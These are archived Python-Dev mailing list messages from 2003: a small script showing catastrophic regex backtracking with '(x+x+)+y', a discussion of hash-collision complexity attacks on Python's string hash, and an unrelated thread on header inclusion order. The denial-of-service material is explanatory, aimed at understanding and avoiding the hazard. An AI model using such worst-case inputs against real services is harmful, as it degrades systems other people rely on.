Here's an unrealistic but tiny example, to get the flavor across:

"""
import re
pat = re.compile('(x+x+)+y')

from time import clock as now

for n in range(10, 100):
    print n,
    start = now()
    pat.search('x' * n + 'y')
    print now() - start,
    start = now()
    pat.search('x' * n)
    print now() - start
"""

The fixed regexp here is

    (x+x+)+y

and we search strings of the form

    xxx...xxxy      which do match
    xxx...xxx       which don't match

The matching cases take time linear in the length of the string, but it's so
fast it's hard to see the time going up at all until the string gets very
large.  The failing cases take time exponential in the length of the string.
Here's sample output:

10 0.000155885951826 0.00068891533549
11 1.59238337887e-005 0.0013736401884
12 1.76000268191e-005 0.00268777552423
13 2.43047989406e-005 0.00609379976198
14 2.51428954558e-005 0.0109438642954
15 3.4361957123e-005 0.0219815954005
16 3.10095710622e-005 0.0673058549423
17 3.26857640926e-005 0.108308050755
18 3.35238606078e-005 0.251965336328
19 3.68762466686e-005 0.334131480581
20 3.68762466685e-005 0.671073936875
21 3.60381501534e-005 1.33723327578
22 3.60381501534e-005 2.68076149449
23 3.6038150153e-005 5.37420757974
24 3.6038150153e-005 10.7601803584
25 3.52000536381e-005

I killed the program then, as I didn't want to wait 20+ seconds for the
25-character string to fail to match.

The horrid problem here is that it takes a highly educated eye to look at
that regexp and see in advance that it's going to have "fast when it
matches, possibly horrid when it doesn't match" behavior -- and this is a
dead easy case to analyze.  In a regexp that slobbers on across multiple
lines, with 5 levels of group nesting, my guess is that no more than 1
programmer in 1000 has even a vague idea how to start looking for such
problems.
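
As an aside, this particular pattern can be rewritten without the nested
quantifier:  'xx+y' matches exactly the same strings as '(x+x+)+y', and
the failing searches then cost at worst quadratic (rather than
exponential) backtracking.  A small sketch in the style of the script
above:

import re
from time import clock as now

safe_pat = re.compile('xx+y')       # same language as (x+x+)+y
for n in (25, 100, 1000):
    start = now()
    safe_pat.search('x' * n)        # no match, but returns promptly
    print n, now() - start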



From tim.one@comcast.net  Sat May 31 21:21:44 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sat, 31 May 2003 16:21:44 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydznl4yon0.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGHEIAB.tim.one@comcast.net>

[Tim]
>> ...
>> Overall, though, I'd welcome a faster string hash, and I agree that
>> Python's isn't particularly zippy.

[Scott Crosby]
> Actually, at least on x86, it is faster than perl. On other platforms,
> it may be somewhat slower.

Perl's isn't particularly zippy either.  I believe that, given heroic coding
effort, a good universal hash designed for speed can get under 1 cycle per
byte hashed on a modern Pentium.  Python's and Perl's string hashes aren't
really in the same ballpark.

> ...
> Yes, I am aware of the problems with the UHASH code. Unfortunately, I
> am not a hash function designer, that code is not mine, and I only use
> it as a black box.
>
> I also consider all code, until verified otherwise, to potentially
> suffer from endianness, alignment, and 32/64 bit issues. Excluding
> alignment issues (which I'm not sure whether to say that it's OK to
> fail on strange alignments or not) it has passed *my* self-tests on
> big endian and 64 bit.

Then who's going to vet the code on a Cray T3 (etc, etc, etc, etc)?  This
isn't a nag, it cuts to the heart of what a language like Python can do:
the x-platform behavior of Python's current string hash is easy to
understand, relying only on what the C standard demands.  It's doing (only)
one evil thing, relying on the unspecified (by C) semantics of what happens
when a signed long multiply overflows.  Python runs on just about every
platform on Earth, and that hasn't been a problem so far.  If it becomes a
problem, we can change the accumulator to unsigned long, and then C would
specify what happens.  There ends the exhaustive discussion of all
portability questions about our current code <wink>.

> ...
>> + Some Python apps run for months, and universal hashing doesn't
>>   remove the possibility of quadratic-time behavior.  If I can poke
>>   at a long-running app and observe its behavior, over time I can
>>   deduce a

> I argued on linux-kernel with someone else that this was extremely
> unlikely. It requires the latency of a collision/non-collision being
> noticeable over a noisy network stack and system.

So you have in mind only apps accessed across a network?  And then, for
example, discounting the possibility that a bitter sysadmin opens an
interactive Python shell on the box, prints out a gazillion (i, hash(i))
pairs and mails them to himself for future mischief?

> In almost all cases, for short inputs, the cost of a single L2 cache
> miss far exceeds that of hashing.

If the user is restricted to short inputs, provoking quadratic-time behavior
doesn't matter.

> A more serious danger is an application that leaks actual hash values.

So ever-more operations become "dangerous".  Programmers will never keep
this straight, and Python isn't a straitjacket language.  I still vote
that apps for which this matters use an *appropriate* data structure
instead -- Python isn't an application, it's a language for programming
applications.

> ...
> Agreed, many have realized over the years that hash tables can have
> quadratic behavior in an adversarial environment.

People from real-time backgrounds are much more paranoid than that, and
perhaps the security-conscious could learn a lot from them.  For example,
you're not going to find a dynamic hash table in a real-time app, because
they can't take a chance on bad luck either.  To them, "an adversary" is
just an unlucky roll of the dice, and they can't tolerate it.

> It isn't hidden. Cormen, Leiserson, and Rivest even warn about this in
> their seminal algorithms textbook in 1991.

Knuth warned about it a lot earlier than that <wink> -- see his summary
of hashing in TAoCP, Vol 3; it gives strong warnings.

> It *is* obvious when thought of, but the reason I was able to ship out
> so many vulnerability reports yesterday was because few actually *have*
> thought of that deterministic worst-case when writing their programs. I
> predict this trend to continue.

I appreciate that, and I expect it to continue too.  I expect a better
solution would be for more languages to offer a choice of containers with
different O() behaviors.  In C it's hard to make progress because the
standard language comes with so little, and so many "portable" C libraries
aren't.  The C++ world is in better shape, constrained more by the
portability of standard C++ itself.  There's less excuse for Python or Perl
programmers to screw up in these areas, because libraries written in Python
and Perl are very portable, and there are lot of 'em to chose from.

> I like hash tables a lot: with UH, their time bounds are randomized
> but pretty tight, and their constant factors are far better than those
> of balanced binary trees.

Probably, but have you used a tree implementation into which the same heroic
level of analysis and coding effort has been poured?  The typical portable-C
balanced tree implementation should be viewed as a worst-case bound on how
fast balanced trees can actually work.

Recently, heroic efforts have been poured into Judy tries, which may be both
faster and more memory-efficent than hash tables in many kinds of apps:

    http://judy.sourceforge.net/

The code for Judy tries makes UHASH look trivial, though.  OTOH, provided
the Judy code actually works on your box, and there aren't bugs hiding in
its thousands of lines of difficult code, relying on a Judy "array" for good
worst-case behavior isn't a matter of luck.



From dave@boost-consulting.com  Sat May 31 23:11:05 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 31 May 2003 18:11:05 -0400
Subject: [Python-Dev] more-precise instructions for "Python.h first"?
In-Reply-To: <m34r3baxna.fsf@mira.informatik.hu-berlin.de> (
 =?iso-8859-1?q?Martin_v._L=F6wis's_message_of?= "31 May 2003 18:28:25
 +0200")
References: <uvfvrrxow.fsf@boost-consulting.com>
 <m34r3baxna.fsf@mira.informatik.hu-berlin.de>
Message-ID: <ullwmkbra.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. Löwis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> Anyway, the point is that I'd like to have the rule changed to "You
>> have to include Python.h or xxxx.h before any system header" where
>> xxxx.h is one of the other existing headers #included in Python.h that
>> is responsible for setting up whatever macros cause this
>> inclusion-order requirement in the first place (preferably not
>> LongObject.h!)
>
> If I understand correctly, you want to follow the rule "I want to
> change things as long as it continues to work for me".

Then you don't understand correctly.

> For that, you don't need any permission. If it works for you, you
> can ignore any rules you feel uncomfortable with.
>
> The rule is there for people who don't want to understand the
> specific details of system configuration. If you manage to get a
> consistent configuration in a different way, just go for it. You
> should make sure then that your users can't run into problems,
> though.

I can't make sure that my users can't run into problems without
understanding everything about Python and Posix which causes the rule
to exist in the first place (and I don't), and continuously monitoring
Python into the future to make sure that the distribution of Posix
configuration information across its headers doesn't change in a way
that invalidates previous assumptions.

The current rule doesn't work for me, but I'd like to be following
_some_ sanctioned rule to reduce the chance of problems today and in
the future. I'm making an educated guess that the rule is much
more-sweeping than Python development needs it to be.  Isn't there
some Python internal configuration header which can be #included first
and which will accomplish all the same things as far as system-header
inclusion order is concerned?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com